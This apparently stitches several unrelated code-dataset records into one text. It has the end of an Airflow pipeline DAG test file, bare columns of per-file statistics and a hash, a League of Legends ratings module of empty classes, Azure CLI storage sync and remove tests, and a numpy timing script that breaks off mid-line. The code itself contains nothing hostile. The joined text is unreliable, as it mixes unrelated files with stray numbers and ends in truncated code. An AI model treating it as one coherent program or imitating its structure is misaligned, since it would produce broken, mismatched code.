provide_context=True, ) dag = TestDAG().get_dag() assert {t.task_id for t in dag.tasks} == get_base_dag_tasks( with_modified_date_check=False ) def test_dag_tasks_with_source_modified_data_utc_callable(): class TestDAG(_PipelineDAG): table_config = TableConfig( table_name="test-table", field_mapping=( ("id", sa.Column("id", sa.Integer, primary_key=True)), ("data", sa.Column("data", sa.Integer)), ), ) def get_fetch_operator(self): return PythonOperator( task_id="fetch-data", python_callable=lambda: None, provide_context=True, ) @staticmethod def get_source_data_modified_utc(self) -> datetime: return datetime(2020, 1, 1) def get_source_data_modified_utc_callable(self): return self.get_source_data_modified_utc dag = TestDAG().get_dag() assert {t.task_id for t in dag.tasks} == get_base_dag_tasks( with_modified_date_check=True ) def test_pipeline_dag_task_relationships(): class TestDAG(_PipelineDAG): table_config = TableConfig( table_name="test-table", field_mapping=( ("id", sa.Column("id", sa.Integer, primary_key=True)), ("data", sa.Column("data", sa.Integer)), ), ) def get_fetch_operator(self): return PythonOperator( task_id="fetch-data", python_callable=lambda: None, provide_context=True, ) dag = TestDAG().get_dag() fetch_data = dag.get_task('fetch-data') create_temp_tables = dag.get_task('create-temp-tables') insert_into_temp_table = dag.get_task('insert-into-temp-table') drop_temp_tables = dag.get_task('drop-temp-tables') check_temp_table_data = dag.get_task('check-temp-table-data') swap_dataset_table = dag.get_task('swap-dataset-table') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 7 assert fetch_data.upstream_task_ids == set() assert fetch_data.downstream_task_ids == {'insert-into-temp-table'} assert create_temp_tables.upstream_task_ids == set() assert create_temp_tables.downstream_task_ids == {'insert-into-temp-table'} assert insert_into_temp_table.upstream_task_ids == { 'create-temp-tables', 'fetch-data', } assert insert_into_temp_table.downstream_task_ids == { 'check-temp-table-data', 'drop-temp-tables', } assert drop_temp_tables.upstream_task_ids == {'insert-into-temp-table'} assert drop_temp_tables.downstream_task_ids == set() assert check_temp_table_data.upstream_task_ids == {'insert-into-temp-table'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == {'drop-swap-tables'} assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() # Add a late index to the table config for the DAG, which should add a new intermediate task. TestDAG.table_config.indexes = [LateIndex('data')] dag = TestDAG().get_dag() fetch_data = dag.get_task('fetch-data') create_temp_tables = dag.get_task('create-temp-tables') insert_into_temp_table = dag.get_task('insert-into-temp-table') drop_temp_tables = dag.get_task('drop-temp-tables') create_post_insert_indexes = dag.get_task('create-post-insert-indexes') check_temp_table_data = dag.get_task('check-temp-table-data') swap_dataset_table = dag.get_task('swap-dataset-table') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 8 assert fetch_data.upstream_task_ids == set() assert fetch_data.downstream_task_ids == {'insert-into-temp-table'} assert create_temp_tables.upstream_task_ids == set() assert create_temp_tables.downstream_task_ids == {'insert-into-temp-table'} assert insert_into_temp_table.upstream_task_ids == { 'create-temp-tables', 'fetch-data', } assert insert_into_temp_table.downstream_task_ids == { 'create-post-insert-indexes', 'drop-temp-tables', } assert create_post_insert_indexes.upstream_task_ids == {'insert-into-temp-table'} assert create_post_insert_indexes.downstream_task_ids == {'check-temp-table-data'} assert drop_temp_tables.upstream_task_ids == {'insert-into-temp-table'} assert drop_temp_tables.downstream_task_ids == set() assert check_temp_table_data.upstream_task_ids == {'create-post-insert-indexes'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == {'drop-swap-tables'} assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() def test_pandas_dag_task_relationships(): class TestDAG(_PandasPipelineWithPollingSupport): use_polling = False data_getter = lambda: None # noqa: E731 table_config = TableConfig( table_name="test-table", field_mapping=( ("id", sa.Column("id", sa.Integer, primary_key=True)), ("data", sa.Column("data", sa.Integer)), ), ) class OtherDAG(_PipelineDAG): table_config = TableConfig( table_name="test-other-table", field_mapping=( ("id", sa.Column("id", sa.Integer, primary_key=True)), ("data", sa.Column("data", sa.Integer)), ), ) def get_fetch_operator(self): return PythonOperator( task_id="fetch-data", python_callable=lambda: None, provide_context=True, ) dag = TestDAG().get_dag() scrape_and_load_data = dag.get_task('scrape-and-load-data') check_temp_table_data = dag.get_task('check-temp-table-data') swap_dataset_table = dag.get_task('swap-dataset-table') drop_temp_tables = dag.get_task('drop-temp-tables') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 5 assert scrape_and_load_data.upstream_task_ids == set() assert scrape_and_load_data.downstream_task_ids == { 'drop-temp-tables', 'check-temp-table-data', } assert check_temp_table_data.upstream_task_ids == {'scrape-and-load-data'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == {'drop-swap-tables'} assert drop_temp_tables.upstream_task_ids == {'scrape-and-load-data'} assert drop_temp_tables.downstream_task_ids == set() assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() # Add a late index to the table config for the DAG, which should add a new intermediate task. TestDAG.table_config.indexes = [LateIndex('data')] dag = TestDAG().get_dag() scrape_and_load_data = dag.get_task('scrape-and-load-data') check_temp_table_data = dag.get_task('check-temp-table-data') create_post_insert_indexes = dag.get_task('create-post-insert-indexes') swap_dataset_table = dag.get_task('swap-dataset-table') drop_temp_tables = dag.get_task('drop-temp-tables') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 6 assert scrape_and_load_data.upstream_task_ids == set() assert scrape_and_load_data.downstream_task_ids == { 'drop-temp-tables', 'create-post-insert-indexes', } assert check_temp_table_data.upstream_task_ids == {'create-post-insert-indexes'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert create_post_insert_indexes.upstream_task_ids == {'scrape-and-load-data'} assert create_post_insert_indexes.downstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == {'drop-swap-tables'} assert drop_temp_tables.upstream_task_ids == {'scrape-and-load-data'} assert drop_temp_tables.downstream_task_ids == set() assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() # Enable polling on the pipeline, which should add a new task at the start of the DAG. TestDAG.use_polling = True dag = TestDAG().get_dag() poll_for_new_data = dag.get_task('poll-for-new-data') scrape_and_load_data = dag.get_task('scrape-and-load-data') check_temp_table_data = dag.get_task('check-temp-table-data') create_post_insert_indexes = dag.get_task('create-post-insert-indexes') swap_dataset_table = dag.get_task('swap-dataset-table') drop_temp_tables = dag.get_task('drop-temp-tables') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 7 assert poll_for_new_data.upstream_task_ids == set() assert poll_for_new_data.downstream_task_ids == {'scrape-and-load-data'} assert scrape_and_load_data.upstream_task_ids == {'poll-for-new-data'} assert scrape_and_load_data.downstream_task_ids == { 'drop-temp-tables', 'create-post-insert-indexes', } assert check_temp_table_data.upstream_task_ids == {'create-post-insert-indexes'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert create_post_insert_indexes.upstream_task_ids == {'scrape-and-load-data'} assert create_post_insert_indexes.downstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == {'drop-swap-tables'} assert drop_temp_tables.upstream_task_ids == {'scrape-and-load-data'} assert drop_temp_tables.downstream_task_ids == set() assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() # Enable email notifications on DAG completion, which adds a new task at the end. TestDAG.update_emails_data_environment_variable = 'MY_ENV_VAR' dag = TestDAG().get_dag() poll_for_new_data = dag.get_task('poll-for-new-data') scrape_and_load_data = dag.get_task('scrape-and-load-data') check_temp_table_data = dag.get_task('check-temp-table-data') create_post_insert_indexes = dag.get_task('create-post-insert-indexes') swap_dataset_table = dag.get_task('swap-dataset-table') send_dataset_updated_emails = dag.get_task('send-dataset-updated-emails') drop_temp_tables = dag.get_task('drop-temp-tables') drop_swap_tables = dag.get_task('drop-swap-tables') assert len(dag.tasks) == 8 assert poll_for_new_data.upstream_task_ids == set() assert poll_for_new_data.downstream_task_ids == {'scrape-and-load-data'} assert scrape_and_load_data.upstream_task_ids == {'poll-for-new-data'} assert scrape_and_load_data.downstream_task_ids == { 'drop-temp-tables', 'create-post-insert-indexes', } assert check_temp_table_data.upstream_task_ids == {'create-post-insert-indexes'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert create_post_insert_indexes.upstream_task_ids == {'scrape-and-load-data'} assert create_post_insert_indexes.downstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == { 'drop-swap-tables', 'send-dataset-updated-emails', } assert drop_temp_tables.upstream_task_ids == {'scrape-and-load-data'} assert drop_temp_tables.downstream_task_ids == set() assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() assert send_dataset_updated_emails.upstream_task_ids == {'swap-dataset-table'} assert send_dataset_updated_emails.downstream_task_ids == set() # Check that tasks are added to trigger downstream DAGs on successful completion of the parent. TestDAG.trigger_dags_on_success = [OtherDAG] dag = TestDAG().get_dag() poll_for_new_data = dag.get_task('poll-for-new-data') scrape_and_load_data = dag.get_task('scrape-and-load-data') check_temp_table_data = dag.get_task('check-temp-table-data') create_post_insert_indexes = dag.get_task('create-post-insert-indexes') swap_dataset_table = dag.get_task('swap-dataset-table') send_dataset_updated_emails = dag.get_task('send-dataset-updated-emails') drop_temp_tables = dag.get_task('drop-temp-tables') drop_swap_tables = dag.get_task('drop-swap-tables') trigger_other_dag = dag.get_task('trigger-OtherDAG') assert len(dag.tasks) == 9 assert poll_for_new_data.upstream_task_ids == set() assert poll_for_new_data.downstream_task_ids == {'scrape-and-load-data'} assert scrape_and_load_data.upstream_task_ids == {'poll-for-new-data'} assert scrape_and_load_data.downstream_task_ids == { 'drop-temp-tables', 'create-post-insert-indexes', } assert check_temp_table_data.upstream_task_ids == {'create-post-insert-indexes'} assert check_temp_table_data.downstream_task_ids == {'swap-dataset-table'} assert create_post_insert_indexes.upstream_task_ids == {'scrape-and-load-data'} assert create_post_insert_indexes.downstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.upstream_task_ids == {'check-temp-table-data'} assert swap_dataset_table.downstream_task_ids == { 'drop-swap-tables', 'send-dataset-updated-emails', 'trigger-OtherDAG', } assert drop_temp_tables.upstream_task_ids == {'scrape-and-load-data'} assert drop_temp_tables.downstream_task_ids == set() assert drop_swap_tables.upstream_task_ids == {'swap-dataset-table'} assert drop_swap_tables.downstream_task_ids == set() assert send_dataset_updated_emails.upstream_task_ids == {'swap-dataset-table'} assert send_dataset_updated_emails.downstream_task_ids == set() assert trigger_other_dag.upstream_task_ids == {'swap-dataset-table'} assert trigger_other_dag.downstream_task_ids == set()
39.805128
99
0.702783
2,097
15,524
4.851693
0.063424
0.068803
0.049145
0.074307
0.910065
0.89768
0.890112
0.878416
0.864262
0.864262
0
0.001259
0.181332
15,524
389
100
39.907455
0.799276
0.029181
0
0.804795
0
0
0.187135
0.076938
0
0
0
0
0.373288
1
0.034247
false
0
0.020548
0.020548
0.116438
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
4684f4e96e9c4cb0667bc158f53fe5337d2c0919
6,545
py
Python
loldib/getratings/models/NA/na_irelia/na_irelia_mid.py
koliupy/loldib
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
[ "Apache-2.0" ]
null
null
null
loldib/getratings/models/NA/na_irelia/na_irelia_mid.py
koliupy/loldib
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
[ "Apache-2.0" ]
null
null
null
loldib/getratings/models/NA/na_irelia/na_irelia_mid.py
koliupy/loldib
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
[ "Apache-2.0" ]
null
null
null
from getratings.models.ratings import Ratings class NA_Irelia_Mid_Aatrox(Ratings): pass class NA_Irelia_Mid_Ahri(Ratings): pass class NA_Irelia_Mid_Akali(Ratings): pass class NA_Irelia_Mid_Alistar(Ratings): pass class NA_Irelia_Mid_Amumu(Ratings): pass class NA_Irelia_Mid_Anivia(Ratings): pass class NA_Irelia_Mid_Annie(Ratings): pass class NA_Irelia_Mid_Ashe(Ratings): pass class NA_Irelia_Mid_AurelionSol(Ratings): pass class NA_Irelia_Mid_Azir(Ratings): pass class NA_Irelia_Mid_Bard(Ratings): pass class NA_Irelia_Mid_Blitzcrank(Ratings): pass class NA_Irelia_Mid_Brand(Ratings): pass class NA_Irelia_Mid_Braum(Ratings): pass class NA_Irelia_Mid_Caitlyn(Ratings): pass class NA_Irelia_Mid_Camille(Ratings): pass class NA_Irelia_Mid_Cassiopeia(Ratings): pass class NA_Irelia_Mid_Chogath(Ratings): pass class NA_Irelia_Mid_Corki(Ratings): pass class NA_Irelia_Mid_Darius(Ratings): pass class NA_Irelia_Mid_Diana(Ratings): pass class NA_Irelia_Mid_Draven(Ratings): pass class NA_Irelia_Mid_DrMundo(Ratings): pass class NA_Irelia_Mid_Ekko(Ratings): pass class NA_Irelia_Mid_Elise(Ratings): pass class NA_Irelia_Mid_Evelynn(Ratings): pass class NA_Irelia_Mid_Ezreal(Ratings): pass class NA_Irelia_Mid_Fiddlesticks(Ratings): pass class NA_Irelia_Mid_Fiora(Ratings): pass class NA_Irelia_Mid_Fizz(Ratings): pass class NA_Irelia_Mid_Galio(Ratings): pass class NA_Irelia_Mid_Gangplank(Ratings): pass class NA_Irelia_Mid_Garen(Ratings): pass class NA_Irelia_Mid_Gnar(Ratings): pass class NA_Irelia_Mid_Gragas(Ratings): pass class NA_Irelia_Mid_Graves(Ratings): pass class NA_Irelia_Mid_Hecarim(Ratings): pass class NA_Irelia_Mid_Heimerdinger(Ratings): pass class NA_Irelia_Mid_Illaoi(Ratings): pass class NA_Irelia_Mid_Irelia(Ratings): pass class NA_Irelia_Mid_Ivern(Ratings): pass class NA_Irelia_Mid_Janna(Ratings): pass class NA_Irelia_Mid_JarvanIV(Ratings): pass class NA_Irelia_Mid_Jax(Ratings): pass class NA_Irelia_Mid_Jayce(Ratings): pass class NA_Irelia_Mid_Jhin(Ratings): pass class NA_Irelia_Mid_Jinx(Ratings): pass class NA_Irelia_Mid_Kalista(Ratings): pass class NA_Irelia_Mid_Karma(Ratings): pass class NA_Irelia_Mid_Karthus(Ratings): pass class NA_Irelia_Mid_Kassadin(Ratings): pass class NA_Irelia_Mid_Katarina(Ratings): pass class NA_Irelia_Mid_Kayle(Ratings): pass class NA_Irelia_Mid_Kayn(Ratings): pass class NA_Irelia_Mid_Kennen(Ratings): pass class NA_Irelia_Mid_Khazix(Ratings): pass class NA_Irelia_Mid_Kindred(Ratings): pass class NA_Irelia_Mid_Kled(Ratings): pass class NA_Irelia_Mid_KogMaw(Ratings): pass class NA_Irelia_Mid_Leblanc(Ratings): pass class NA_Irelia_Mid_LeeSin(Ratings): pass class NA_Irelia_Mid_Leona(Ratings): pass class NA_Irelia_Mid_Lissandra(Ratings): pass class NA_Irelia_Mid_Lucian(Ratings): pass class NA_Irelia_Mid_Lulu(Ratings): pass class NA_Irelia_Mid_Lux(Ratings): pass class NA_Irelia_Mid_Malphite(Ratings): pass class NA_Irelia_Mid_Malzahar(Ratings): pass class NA_Irelia_Mid_Maokai(Ratings): pass class NA_Irelia_Mid_MasterYi(Ratings): pass class NA_Irelia_Mid_MissFortune(Ratings): pass class NA_Irelia_Mid_MonkeyKing(Ratings): pass class NA_Irelia_Mid_Mordekaiser(Ratings): pass class NA_Irelia_Mid_Morgana(Ratings): pass class NA_Irelia_Mid_Nami(Ratings): pass class NA_Irelia_Mid_Nasus(Ratings): pass class NA_Irelia_Mid_Nautilus(Ratings): pass class NA_Irelia_Mid_Nidalee(Ratings): pass class NA_Irelia_Mid_Nocturne(Ratings): pass class NA_Irelia_Mid_Nunu(Ratings): pass class NA_Irelia_Mid_Olaf(Ratings): pass class NA_Irelia_Mid_Orianna(Ratings): pass class NA_Irelia_Mid_Ornn(Ratings): pass class NA_Irelia_Mid_Pantheon(Ratings): pass class NA_Irelia_Mid_Poppy(Ratings): pass class NA_Irelia_Mid_Quinn(Ratings): pass class NA_Irelia_Mid_Rakan(Ratings): pass class NA_Irelia_Mid_Rammus(Ratings): pass class NA_Irelia_Mid_RekSai(Ratings): pass class NA_Irelia_Mid_Renekton(Ratings): pass class NA_Irelia_Mid_Rengar(Ratings): pass class NA_Irelia_Mid_Riven(Ratings): pass class NA_Irelia_Mid_Rumble(Ratings): pass class NA_Irelia_Mid_Ryze(Ratings): pass class NA_Irelia_Mid_Sejuani(Ratings): pass class NA_Irelia_Mid_Shaco(Ratings): pass class NA_Irelia_Mid_Shen(Ratings): pass class NA_Irelia_Mid_Shyvana(Ratings): pass class NA_Irelia_Mid_Singed(Ratings): pass class NA_Irelia_Mid_Sion(Ratings): pass class NA_Irelia_Mid_Sivir(Ratings): pass class NA_Irelia_Mid_Skarner(Ratings): pass class NA_Irelia_Mid_Sona(Ratings): pass class NA_Irelia_Mid_Soraka(Ratings): pass class NA_Irelia_Mid_Swain(Ratings): pass class NA_Irelia_Mid_Syndra(Ratings): pass class NA_Irelia_Mid_TahmKench(Ratings): pass class NA_Irelia_Mid_Taliyah(Ratings): pass class NA_Irelia_Mid_Talon(Ratings): pass class NA_Irelia_Mid_Taric(Ratings): pass class NA_Irelia_Mid_Teemo(Ratings): pass class NA_Irelia_Mid_Thresh(Ratings): pass class NA_Irelia_Mid_Tristana(Ratings): pass class NA_Irelia_Mid_Trundle(Ratings): pass class NA_Irelia_Mid_Tryndamere(Ratings): pass class NA_Irelia_Mid_TwistedFate(Ratings): pass class NA_Irelia_Mid_Twitch(Ratings): pass class NA_Irelia_Mid_Udyr(Ratings): pass class NA_Irelia_Mid_Urgot(Ratings): pass class NA_Irelia_Mid_Varus(Ratings): pass class NA_Irelia_Mid_Vayne(Ratings): pass class NA_Irelia_Mid_Veigar(Ratings): pass class NA_Irelia_Mid_Velkoz(Ratings): pass class NA_Irelia_Mid_Vi(Ratings): pass class NA_Irelia_Mid_Viktor(Ratings): pass class NA_Irelia_Mid_Vladimir(Ratings): pass class NA_Irelia_Mid_Volibear(Ratings): pass class NA_Irelia_Mid_Warwick(Ratings): pass class NA_Irelia_Mid_Xayah(Ratings): pass class NA_Irelia_Mid_Xerath(Ratings): pass class NA_Irelia_Mid_XinZhao(Ratings): pass class NA_Irelia_Mid_Yasuo(Ratings): pass class NA_Irelia_Mid_Yorick(Ratings): pass class NA_Irelia_Mid_Zac(Ratings): pass class NA_Irelia_Mid_Zed(Ratings): pass class NA_Irelia_Mid_Ziggs(Ratings): pass class NA_Irelia_Mid_Zilean(Ratings): pass class NA_Irelia_Mid_Zyra(Ratings): pass
15.695444
46
0.766692
972
6,545
4.736626
0.151235
0.209818
0.389661
0.479583
0.803432
0.803432
0
0
0
0
0
0
0.169748
6,545
416
47
15.733173
0.847258
0
0
0.498195
0
0
0
0
0
0
0
0
0
1
0
true
0.498195
0.00361
0
0.501805
0
0
0
0
null
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
1
0
0
8
46a31bb804fe884424d13301867c472f090e4cb6
10,233
py
Python
src/azure-cli/azure/cli/command_modules/storage/tests/latest/test_storage_azcopy_scenarios.py
kitingChris/azure-cli
ed0db1ca79f92a8ca686d2c8da501f37c240df9e
[ "MIT" ]
1
2019-07-27T11:23:36.000Z
2019-07-27T11:23:36.000Z
src/azure-cli/azure/cli/command_modules/storage/tests/latest/test_storage_azcopy_scenarios.py
kitingChris/azure-cli
ed0db1ca79f92a8ca686d2c8da501f37c240df9e
[ "MIT" ]
null
null
null
src/azure-cli/azure/cli/command_modules/storage/tests/latest/test_storage_azcopy_scenarios.py
kitingChris/azure-cli
ed0db1ca79f92a8ca686d2c8da501f37c240df9e
[ "MIT" ]
null
null
null
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- import os import shutil from azure.cli.testsdk import (StorageAccountPreparer, LiveScenarioTest, JMESPathCheck, ResourceGroupPreparer, api_version_constraint) from ..storage_test_util import StorageScenarioMixin, StorageTestFilesPreparer class StorageAzcopyTests(StorageScenarioMixin, LiveScenarioTest): @ResourceGroupPreparer() @StorageAccountPreparer() @StorageTestFilesPreparer() def test_storage_blob_azcopy_sync(self, resource_group, storage_account_info, test_dir): storage_account, _ = storage_account_info container = self.create_container(storage_account_info) # sync directory self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) self.cmd('storage blob delete-batch -s {} --account-name {}'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 0)) # resync container self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) # update file with open(os.path.join(test_dir, 'readme'), 'w') as f: f.write('updated.') # sync one blob self.cmd('storage blob list -c {} --account-name {} --prefix readme'.format( container, storage_account), checks=JMESPathCheck('[0].properties.contentLength', 87)) self.cmd('storage blob sync -s "{}" -c {} --account-name {} -d readme'.format( os.path.join(test_dir, 'readme'), container, storage_account)) self.cmd('storage blob list -c {} --account-name {} --prefix readme'.format( container, storage_account), checks=JMESPathCheck('[0].properties.contentLength', 8)) # delete one file and sync os.remove(os.path.join(test_dir, 'readme')) self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 40)) # delete one folder and sync shutil.rmtree(os.path.join(test_dir, 'apple')) self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 30)) # syn with another folder self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( os.path.join(test_dir, 'butter'), container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 20)) # empty the folder and sync shutil.rmtree(os.path.join(test_dir, 'butter')) shutil.rmtree(os.path.join(test_dir, 'duff')) self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 0)) @ResourceGroupPreparer() @StorageAccountPreparer() @StorageTestFilesPreparer() def test_storage_blob_azcopy_remove(self, resource_group, storage_account_info, test_dir): storage_account, _ = storage_account_info container = self.create_container(storage_account_info) # sync directory self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) self.cmd('storage remove -c {} -n readme --account-name {}'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 40)) self.cmd('storage remove -c {} -n apple --account-name {}'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 30)) self.cmd('storage remove -c {} -n butter --account-name {}'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 20)) self.cmd('storage remove -c {} -n butter --account-name {} --recursive'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 10)) self.cmd('storage remove -c {} -n duff --account-name {}'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 10)) # sync directory self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) self.cmd('storage remove -c {} -n butter --account-name {} --recursive --exclude "file_*"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) self.cmd('storage remove -c {} -n butter --account-name {} --exclude "file_1"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 32)) self.cmd('storage remove -c {} -n butter --account-name {} --recursive --exclude "file_1"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 23)) # sync directory self.cmd('storage blob sync -s "{}" -c {} --account-name {}'.format( test_dir, container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 41)) self.cmd('storage remove -c {} -n butter --account-name {} --recursive --include "file_1"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 39)) self.cmd('storage remove -c {} -n butter --account-name {} --include "file_*"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 30)) self.cmd('storage remove -c {} -n butter --account-name {} --recursive --include "file_*"'.format( container, storage_account)) self.cmd('storage blob list -c {} --account-name {}'.format( container, storage_account), checks=JMESPathCheck('length(@)', 21)) @ResourceGroupPreparer() @StorageAccountPreparer() def test_storage_file_azcopy_remove(self, resource_group, storage_account): account_info = self.get_account_info(resource_group, storage_account) s1 = self.create_share(account_info) s2 = self.create_share(account_info) d1 = 'dir1' d2 = 'dir2' self.storage_cmd('storage directory create --share-name {} -n {}', account_info, s1, d1) self.storage_cmd('storage directory create --share-name {} -n {}', account_info, s2, d2) local_file = self.create_temp_file(512, full_random=False) src1_file = os.path.join(d1, 'source_file1.txt') src2_file = os.path.join(d2, 'source_file2.txt') self.storage_cmd('storage file upload -p "{}" --share-name {} --source "{}"', account_info, src1_file, s1, local_file) self.storage_cmd('storage file exists -p "{}" -s {}', account_info, src1_file, s1) \ .assert_with_checks(JMESPathCheck('exists', True)) self.storage_cmd('storage remove --share-name {} -p "{}"', account_info, s1, src1_file) self.storage_cmd('storage file exists -p "{}" -s {}', account_info, src1_file, s1) \ .assert_with_checks(JMESPathCheck('exists', False)) self.storage_cmd('storage file upload -p "{}" --share-name {} --source "{}"', account_info, src2_file, s2, local_file) self.storage_cmd('storage file exists -p "{}" -s {}', account_info, src2_file, s2) \ .assert_with_checks(JMESPathCheck('exists', True)) self.storage_cmd('storage remove --share-name {} -p "{}"', account_info, s2, d2) self.storage_cmd('storage file exists -p "{}" -s {}', account_info, src2_file, s2) \ .assert_with_checks(JMESPathCheck('exists', False))
53.296875
110
0.609596
1,127
10,233
5.393079
0.116238
0.126686
0.177855
0.166996
0.861797
0.849951
0.823955
0.811122
0.781178
0.769003
0
0.010431
0.222418
10,233
191
111
53.575916
0.753425
0.052868
0
0.65035
0
0
0.309425
0.005788
0
0
0
0
0.027972
1
0.020979
false
0
0.027972
0
0.055944
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
d3c9e0d4ce33dd4a138e4d57f14a8ffbeab8c45b
2,006
py
Python
dev/optimize/measure_np_create_arr.py
StefanHeng/test_ECG-Signal-Viewer
4fc1849aa5d8ff9bf18d3662bc405d7f20663b64
[ "MIT" ]
null
null
null
dev/optimize/measure_np_create_arr.py
StefanHeng/test_ECG-Signal-Viewer
4fc1849aa5d8ff9bf18d3662bc405d7f20663b64
[ "MIT" ]
null
null
null
dev/optimize/measure_np_create_arr.py
StefanHeng/test_ECG-Signal-Viewer
4fc1849aa5d8ff9bf18d3662bc405d7f20663b64
[ "MIT" ]
null
null
null
import numpy as np import timeit from optimize import optimize_time_conversion def measure_np_arange(sz, num=3): return min(timeit.Timer(f'arr = np.arange({sz})', setup=f'import numpy as np').repeat(10, num)) def measure_np_arange_f(sz, num=3): return min(timeit.Timer(f'arr = np.arange({sz}) / 2', setup=f'import numpy as np').repeat(10, num)) def measure_np_arange_us(sz, num=3): return min(timeit.Timer(f'arr = np.arange({sz}) * 500', setup=f'import numpy as np').repeat(10, num)) def measure_np_arange_us_f(sz, num=3): return min(timeit.Timer(f'arr = np.arange({sz}) * 500.0', setup=f'import numpy as np').repeat(10, num)) def measure_np_linspace(sz, num=3): return min(timeit.Timer(f'arr = np.linspace(0, {sz-1}, {sz})', setup=f'import numpy as np').repeat(10, num)) def measure_np_linspace_f(sz, num=3): return min(timeit.Timer(f'arr = np.linspace(0, {sz-1}, {sz}) / 2', setup=f'import numpy as np').repeat(10, num)) def measure_np_change_type(sz, num=3): return min(timeit.Timer(f'arr = np.linspace(0, {sz-1}, {sz}) * 500.0', setup=f'import numpy as np').repeat(10, num)) def measure_np_mult_v1(sz, num=3): return 